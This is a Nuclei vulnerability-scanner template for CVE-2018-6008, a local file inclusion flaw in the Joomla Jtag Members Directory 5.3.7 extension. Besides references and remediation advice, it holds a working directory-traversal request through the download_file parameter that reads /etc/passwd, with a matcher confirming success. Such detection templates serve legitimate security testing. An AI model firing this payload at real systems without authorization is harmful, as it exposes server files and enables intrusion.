nuclei-templates/http/cves/2018/CVE-2018-6008.yaml

47 lines
1.9 KiB
YAML

id: CVE-2018-6008
info:
name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
remediation: |
Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
reference:
- https://www.exploit-db.com/exploits/43913
- https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-6008
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-6008
cwe-id: CWE-200
epss-score: 0.3768
epss-percentile: 0.97202
cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:*
metadata:
max-request: 1
vendor: joomlatag
product: jtag_members_directory
framework: joomla\!
tags: cve2018,cve,joomla,lfi,edb,packetstorm,joomlatag,joomla\!
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402203fb92c4f132a4c77e2a6d30db6a1542220ceb34cc491834093e91897ef2900b002200b2abc6e1eff9c1d819081c3d6e143d471641d33399dcae94ea1d557b3f4a9c7:922c64590222798bb761d5b6d8e72950